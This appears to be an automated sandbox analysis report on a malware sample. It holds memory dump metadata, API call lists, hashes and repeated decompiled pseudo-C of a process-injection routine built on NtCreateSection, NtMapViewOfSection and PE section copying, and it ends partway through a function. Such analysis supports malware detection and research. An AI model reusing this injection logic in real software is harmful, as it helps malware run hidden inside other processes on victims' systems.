                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_70d000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6d0000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377699254.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_409000_file.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:5.2%
                                                          Dynamic/Decrypted Code Coverage:67.3%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:159
                                                          Total number of Limit Nodes:10

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          C-Code - Quality: 59%
                                                          			E004014A8(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				char _v44;
                                                          				char _v52;
                                                          				long _v56;
                                                          				long _v60;
                                                          				char _v64;
                                                          				char _v68;
                                                          				char _v72;
                                                          				char _v76;
                                                          				char _v84;
                                                          				char _v88;
                                                          				char _v92;
                                                          				intOrPtr _v96;
                                                          				char _v100;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __ebp;
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t127;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t129;
                                                          				long* _t130;
                                                          				signed int _t137;
                                                          				int _t138;
                                                          				signed int _t157;
                                                          				signed int _t158;
                                                          				signed int _t159;
                                                          				void* _t160;
                                                          				intOrPtr* _t161;
                                                          				void* _t164;
                                                          				void* _t171;
                                                          				long _t172;
                                                          				intOrPtr _t173;
                                                          				void* _t174;
                                                          				long* _t180;
                                                          				intOrPtr* _t181;
                                                          				HANDLE* _t182;
                                                          				HANDLE* _t183;
                                                          				void* _t188;
                                                          				void* _t189;
                                                          				intOrPtr* _t192;
                                                          				void* _t193;
                                                          				intOrPtr _t196;
                                                          				intOrPtr* _t197;
                                                          				intOrPtr* _t198;
                                                          				void* _t200;
                                                          				intOrPtr* _t201;
                                                          				void* _t202;
                                                          				long _t217;
                                                          
                                                          				_t84 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t128 =  *_t197;
                                                          				_t198 = _t197 + 4;
                                                          				L0040119E(_t84, _t128, _t171, __eflags);
                                                          				_t127 = _a4;
                                                          				_t172 = 0;
                                                          				_v56 = 0;
                                                          				if(gs != 0) {
                                                          					_v56 = _v56 + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                                                          				}
                                                          				_v96 = _t87;
                                                          				_t180 =  &_v100;
                                                          				 *_t180 = _t172;
                                                          				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
                                                          				_t90 =  *_t180;
                                                          				if(_t90 != 0) {
                                                          					_t130 =  &_v52;
                                                          					 *_t130 = _t90;
                                                          					_t130[1] = _t172;
                                                          					_t181 =  &_v44;
                                                          					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
                                                          					 *_t181 = 0x18;
                                                          					_push( &_v52);
                                                          					_push(_t181);
                                                          					_push(0x40);
                                                          					_push( &_v20);
                                                          					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t172, _t172, 2) == 0) {
                                                          						_v12 = _t172;
                                                          						_t98 =  &_v84;
                                                          						 *(_t98 + 4) = _t172;
                                                          						 *_t98 = 0x5000;
                                                          						_t182 =  &_v88;
                                                          						if(NtCreateSection(_t182, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
                                                          							_push(_v84);
                                                          							_pop( *_t25);
                                                          							_t121 =  &_v72;
                                                          							 *_t121 = _t172;
                                                          							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                                                          								_t123 =  &_v64;
                                                          								 *_t123 = _t172;
                                                          								if(NtMapViewOfSection( *_t182, _v16, _t123, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                                                          									_t196 = _v72;
                                                          									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t196, 0x104);
                                                          									 *((intOrPtr*)(_t196 + 0x208)) = _a16;
                                                          									_v12 = _v12 + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 =  &_v84;
                                                          						 *(_t100 + 4) = _t172;
                                                          						 *_t100 = _a12 + 0x10000;
                                                          						_t183 =  &_v92;
                                                          						if(NtCreateSection(_t183, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 && _v12 != 0) {
                                                          							_push(_v84);
                                                          							_pop( *_t46);
                                                          							_t102 =  &_v76;
                                                          							 *_t102 = _t172;
                                                          							if(NtMapViewOfSection( *_t183, 0xffffffff, _t102, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
                                                          								_t104 =  &_v68;
                                                          								 *_t104 = _t172;
                                                          								_t217 = NtMapViewOfSection( *_t183, _v16, _t104, _t172, _t172, _t172,  &_v60, 1, _t172, 0x20);
                                                          								if(_t217 == 0) {
                                                          									L21();
                                                          									if(_t217 == 0 && _t217 != 0) {
                                                          									}
                                                          									_t200 = _t198 + 4;
                                                          									_push(0x2e62);
                                                          									_t201 = _t200 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t201;
                                                          									_t202 = _t201 + 4;
                                                          									_t157 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t158 = _t157;
                                                          									asm("loop 0xffffffc2");
                                                          									_t159 = _t158 ^ 0xbcc951dd;
                                                          									_t198 = _t202 - _t159;
                                                          									_t188 = _a8 +  *_a8;
                                                          									_t137 =  *(_t188 + 6) & 0x0000ffff;
                                                          									_push(_t188);
                                                          									_t160 = _t188;
                                                          									if(_v56 == 0) {
                                                          										_t161 = _t160 + 0xf8;
                                                          										__eflags = _t161;
                                                          									} else {
                                                          										_t161 = _t160 + 0x108;
                                                          									}
                                                          									_push(_t137);
                                                          									_t138 =  *(_t161 + 0x10);
                                                          									if(_t138 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
                                                          										_t198 = _t198 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t189);
                                                          									_t222 = _v56;
                                                          									if(_v56 == 0) {
                                                          										_push(_t189);
                                                          										_t164 =  *((intOrPtr*)(_t189 + 0x34)) - _v68;
                                                          										_t192 =  *((intOrPtr*)(_t189 + 0xa0)) + _v76;
                                                          										__eflags = _t192;
                                                          										while(1) {
                                                          											__eflags =  *_t192;
                                                          											if( *_t192 == 0) {
                                                          												break;
                                                          											}
                                                          											_t173 =  *_t192;
                                                          											_t192 = _t192 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
                                                          												__eflags =  *((intOrPtr*)(0 + _v76 + _t173));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t193);
                                                          										_t172 = 0;
                                                          										__eflags = 0;
                                                          										_t108 =  &_v8;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t193 + 0x28)) + _v68, _v64, _t108, 0);
                                                          									} else {
                                                          										L54();
                                                          										_pop(_t174);
                                                          										_t172 = _t174 - 0x1760;
                                                          										 *((intOrPtr*)(_t172 + 0x1794)) = _t172 + 0x2c17;
                                                          										L00401227(_t127, _t172, _t222, _t172 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t172 + 0x17b9)) = _t172 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t129 =  *_t198;
                                                          				return L0040119E(_t91, _t129, _t172, _t222);
                                                          			}

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                                                          • Instruction ID: cd3d7ef155730ff18c04e90283d35d9337f0c2e1175127a0e4488d23b7b2eda1
                                                          • Opcode Fuzzy Hash: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                                                          • Instruction Fuzzy Hash: B6511871900249BBEB219F91CC48FEBBBB9EF85B10F104129FA11BA2E5D7749941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 200 4014b3-4014c4 202 4014db 200->202 203 4014cc-4014f1 call 40119e 200->203 202->203 207 4014f3 203->207 208 4014f6-4014fb 203->208 207->208 210 401501-401512 208->210 211 401824-40182c 208->211 215 401822 210->215 216 401518-401541 210->216 211->208 214 401831-401842 211->214 218 401845-401866 call 40119e 214->218 219 401838-40183e 214->219 215->214 216->215 225 401547-40155e NtDuplicateObject 216->225 219->218 225->215 227 401564-401588 NtCreateSection 225->227 229 4015e4-40160a NtCreateSection 227->229 230 40158a-4015ab NtMapViewOfSection 227->230 229->215 233 401610-401614 229->233 230->229 232 4015ad-4015c9 NtMapViewOfSection 230->232 232->229 234 4015cb-4015e1 232->234 233->215 235 40161a-40163b NtMapViewOfSection 233->235 234->229 235->215 236 401641-40165d NtMapViewOfSection 235->236 236->215 238 401663 call 401668 236->238
                                                          C-Code - Quality: 63%
                                                          			E004014B3(void* __ebx, void* __edi, void* __eflags) {
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t130;
                                                          				intOrPtr _t131;
                                                          				long* _t132;
                                                          				signed int _t139;
                                                          				int _t140;
                                                          				signed int _t161;
                                                          				signed int _t162;
                                                          				signed int _t163;
                                                          				void* _t164;
                                                          				intOrPtr* _t165;
                                                          				void* _t168;
                                                          				long _t176;
                                                          				intOrPtr _t178;
                                                          				void* _t179;
                                                          				long* _t185;
                                                          				intOrPtr* _t187;
                                                          				HANDLE* _t188;
                                                          				HANDLE* _t189;
                                                          				void* _t194;
                                                          				void* _t195;
                                                          				intOrPtr* _t198;
                                                          				void* _t199;
                                                          				void* _t202;
                                                          				void* _t203;
                                                          				void* _t205;
                                                          				intOrPtr* _t206;
                                                          				intOrPtr* _t207;
                                                          				void* _t210;
                                                          				intOrPtr* _t211;
                                                          				void* _t212;
                                                          				long _t227;
                                                          
                                                          				_t206 = _t205 + 1;
                                                          				_t84 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t130 =  *_t206;
                                                          				_t207 = _t206 + 4;
                                                          				L0040119E(_t84, _t130, __edi, __eflags);
                                                          				_t128 =  *((intOrPtr*)(_t203 + 8));
                                                          				_t176 = 0;
                                                          				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                          				if(gs != 0) {
                                                          					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                          				}
                                                          				 *((intOrPtr*)(_t203 - 0x5c)) = _t87;
                                                          				_t185 = _t203 - 0x60;
                                                          				 *_t185 = _t176;
                                                          				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t185);
                                                          				_t90 =  *_t185;
                                                          				if(_t90 != 0) {
                                                          					_t132 = _t203 - 0x30;
                                                          					 *_t132 = _t90;
                                                          					_t132[1] = _t176;
                                                          					_t187 = _t203 - 0x28;
                                                          					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                                                          					 *_t187 = 0x18;
                                                          					_push(_t203 - 0x30);
                                                          					_push(_t187);
                                                          					_push(0x40);
                                                          					_push(_t203 - 0x10);
                                                          					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
                                                          						 *(_t203 - 8) = _t176;
                                                          						_t98 = _t203 - 0x50;
                                                          						 *(_t98 + 4) = _t176;
                                                          						 *_t98 = 0x5000;
                                                          						_t188 = _t203 - 0x54;
                                                          						if(NtCreateSection(_t188, 6, _t176, _t98, 4, 0x8000000, _t176) == 0) {
                                                          							 *_t25 =  *(_t203 - 0x50);
                                                          							_t121 = _t203 - 0x44;
                                                          							 *_t121 = _t176;
                                                          							if(NtMapViewOfSection( *_t188, 0xffffffff, _t121, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                          								_t123 = _t203 - 0x3c;
                                                          								 *_t123 = _t176;
                                                          								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t123, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                          									_t202 =  *(_t203 - 0x44);
                                                          									 *((intOrPtr*)(_t128 + 0x20))(_t176, _t202, 0x104);
                                                          									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                          									 *(_t203 - 8) =  *(_t203 - 8) + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 = _t203 - 0x50;
                                                          						 *(_t100 + 4) = _t176;
                                                          						 *_t100 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                          						_t189 = _t203 - 0x58;
                                                          						if(NtCreateSection(_t189, 0xe, _t176, _t100, 0x40, 0x8000000, _t176) == 0 &&  *(_t203 - 8) != 0) {
                                                          							 *_t46 =  *(_t203 - 0x50);
                                                          							_t102 = _t203 - 0x48;
                                                          							 *_t102 = _t176;
                                                          							if(NtMapViewOfSection( *_t189, 0xffffffff, _t102, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                          								_t104 = _t203 - 0x40;
                                                          								 *_t104 = _t176;
                                                          								_t227 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t104, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 0x20);
                                                          								if(_t227 == 0) {
                                                          									L20();
                                                          									if(_t227 == 0 && _t227 != 0) {
                                                          									}
                                                          									_t210 = _t207 + 4;
                                                          									_push(0x2e62);
                                                          									_t211 = _t210 + 4;
                                                          									_push(0x2260);
                                                          									_t106 =  *_t211;
                                                          									_t212 = _t211 + 4;
                                                          									_t161 = (0x2260 << 5) + _t106;
                                                          									asm("lodsb");
                                                          									_t162 = _t161;
                                                          									asm("loop 0xffffffc2");
                                                          									_t163 = _t162 ^ 0xbcc951dd;
                                                          									_t207 = _t212 - _t163;
                                                          									_t194 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                                                          									_t139 =  *(_t194 + 6) & 0x0000ffff;
                                                          									_push(_t194);
                                                          									_t164 = _t194;
                                                          									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                          										_t165 = _t164 + 0xf8;
                                                          										__eflags = _t165;
                                                          									} else {
                                                          										_t165 = _t164 + 0x108;
                                                          									}
                                                          									_push(_t139);
                                                          									_t140 =  *(_t165 + 0x10);
                                                          									if(_t140 != 0) {
                                                          										memcpy( *((intOrPtr*)(_t165 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t165 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
                                                          										_t207 = _t207 + 0xc;
                                                          									}
                                                          									asm("loop 0xffffffe6");
                                                          									_pop(_t195);
                                                          									_t232 =  *((intOrPtr*)(_t203 - 0x34));
                                                          									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                          										_push(_t195);
                                                          										_t168 =  *((intOrPtr*)(_t195 + 0x34)) -  *(_t203 - 0x40);
                                                          										_t198 =  *((intOrPtr*)(_t195 + 0xa0)) +  *(_t203 - 0x48);
                                                          										__eflags = _t198;
                                                          										while(1) {
                                                          											__eflags =  *_t198;
                                                          											if( *_t198 == 0) {
                                                          												break;
                                                          											}
                                                          											_t178 =  *_t198;
                                                          											_t198 = _t198 + 8;
                                                          											asm("lodsw");
                                                          											__eflags = 0;
                                                          											if(0 != 0) {
                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t168;
                                                          												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t178));
                                                          											}
                                                          											asm("loop 0xffffffe9");
                                                          										}
                                                          										_pop(_t199);
                                                          										_t176 = 0;
                                                          										__eflags = 0;
                                                          										_t108 = _t203 - 4;
                                                          										 *_t108 = 0;
                                                          										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t199 + 0x28)) +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t108, 0);
                                                          									} else {
                                                          										L53();
                                                          										_pop(_t179);
                                                          										_t176 = _t179 - 0x1760;
                                                          										 *((intOrPtr*)(_t176 + 0x1794)) = _t176 + 0x2c17;
                                                          										L00401227(_t128, _t176, _t232, _t176 + 0x2c17, 0x1ad);
                                                          										0x33();
                                                          										 *((intOrPtr*)(_t176 + 0x17b9)) = _t176 + 0x2c67;
                                                          										0x33();
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t91 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t131 =  *_t207;
                                                          				return L0040119E(_t91, _t131, _t176, _t232);
                                                          			}


                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                                                          • Instruction ID: 39cbb5cf0de6fd42451f7104dd6b59036266353996c087b5e70b14ffae25b97f
                                                          • Opcode Fuzzy Hash: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                                                          • Instruction Fuzzy Hash: 29512971900245BFEB219F91CC49FEF7BB9EF85B00F10412AFA11AA2A5D7709941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 240 4014bf-4014c4 244 4014db 240->244 245 4014cc-4014f1 call 40119e 240->245 244->245 249 4014f3 245->249 250 4014f6-4014fb 245->250 249->250 252 401501-401512 250->252 253 401824-40182c 250->253 257 401822 252->257 258 401518-401541 252->258 253->250 256 401831-401842 253->256 260 401845-401866 call 40119e 256->260 261 401838-40183e 256->261 257->256 258->257 267 401547-40155e NtDuplicateObject 258->267 261->260 267->257 269 401564-401588 NtCreateSection 267->269 271 4015e4-40160a NtCreateSection 269->271 272 40158a-4015ab NtMapViewOfSection 269->272 271->257 275 401610-401614 271->275 272->271 274 4015ad-4015c9 NtMapViewOfSection 272->274 274->271 276 4015cb-4015e1 274->276 275->257 277 40161a-40163b NtMapViewOfSection 275->277 276->271 277->257 278 401641-40165d NtMapViewOfSection 277->278 278->257 280 401663 call 401668 278->280
                                                          C-Code - Quality: 62%
                                                          			E004014BF(void* __ebx, void* __edi, void* __eflags) {
                                                          				void* _t84;
                                                          				intOrPtr _t87;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				struct _GUID _t98;
                                                          				struct _GUID _t100;
                                                          				PVOID* _t102;
                                                          				PVOID* _t104;
                                                          				intOrPtr _t106;
                                                          				intOrPtr* _t108;
                                                          				PVOID* _t121;
                                                          				PVOID* _t123;
                                                          				intOrPtr _t128;
                                                          				intOrPtr _t130;
                                                          				intOrPtr _t131;
                                                          				long* _t132;
                                                          				signed int _t139;
                                                          				int _t140;
                                                          				signed int _t159;
                                                          				signed int _t160;
                                                          				signed int _t161;
                                                          				void* _t162;
                                                          				intOrPtr* _t163;
                                                          				void* _t166;
                                                          				long _t174;
                                                          				intOrPtr _t176;
                                                          				void* _t177;
                                                          				long* _t183;
                                                          				intOrPtr* _t185;
                                                          				HANDLE* _t186;
                                                          				HANDLE* _t187;
                                                          				void* _t192;
                                                          				void* _t193;
                                                          				intOrPtr* _t196;
                                                          				void* _t197;
                                                          				void* _t200;
                                                          				void* _t201;
                                                          				intOrPtr* _t203;
                                                          				intOrPtr* _t204;
                                                          				void* _t207;
                                                          				intOrPtr* _t208;
                                                          				void* _t209;
                                                          				long _t224;
                                                          
                                                          				asm("invalid");
                                                          				_t84 = 0x14e3;
                                                          				_push(0x37f);
                                                          				_t130 =  *_t203;
                                                          				_t204 = _t203 + 4;
                                                          				L0040119E(_t84, _t130, __edi, __eflags);
                                                          				_t128 =  *((intOrPtr*)(_t201 + 8));
                                                          				_t174 = 0;
                                                          				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                                                          				if(gs != 0) {
                                                          					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                                                          				}
                                                          				while(1) {
                                                          					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                                                          					if(_t87 != 0) {
                                                          						break;
                                                          					}
                                                          					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                          				}
                                                          				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
                                                          				_t183 = _t201 - 0x60;
                                                          				 *_t183 = _t174;
                                                          				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
                                                          				_t90 =  *_t183;
                                                          				if(_t90 != 0) {
                                                          					_t132 = _t201 - 0x30;
                                                          					 *_t132 = _t90;
                                                          					_t132[1] = _t174;
                                                          					_t185 = _t201 - 0x28;
                                                          					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
                                                          					 *_t185 = 0x18;
                                                          					_push(_t201 - 0x30);
                                                          					_push(_t185);
                                                          					_push(0x40);
                                                          					_push(_t201 - 0x10);
                                                          					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
                                                          						 *(_t201 - 8) = _t174;
                                                          						_t98 = _t201 - 0x50;
                                                          						 *(_t98 + 4) = _t174;
                                                          						 *_t98 = 0x5000;
                                                          						_t186 = _t201 - 0x54;
                                                          						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
                                                          							 *_t25 =  *(_t201 - 0x50);
                                                          							_t121 = _t201 - 0x44;
                                                          							 *_t121 = _t174;
                                                          							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          								_t123 = _t201 - 0x3c;
                                                          								 *_t123 = _t174;
                                                          								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                                                          									_t200 =  *(_t201 - 0x44);
                                                          									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
                                                          									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                                                          									 *(_t201 - 8) =  *(_t201 - 8) + 1;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t100 = _t201 - 0x50;
                                                          						 *(_t100 + 4) = _t174;
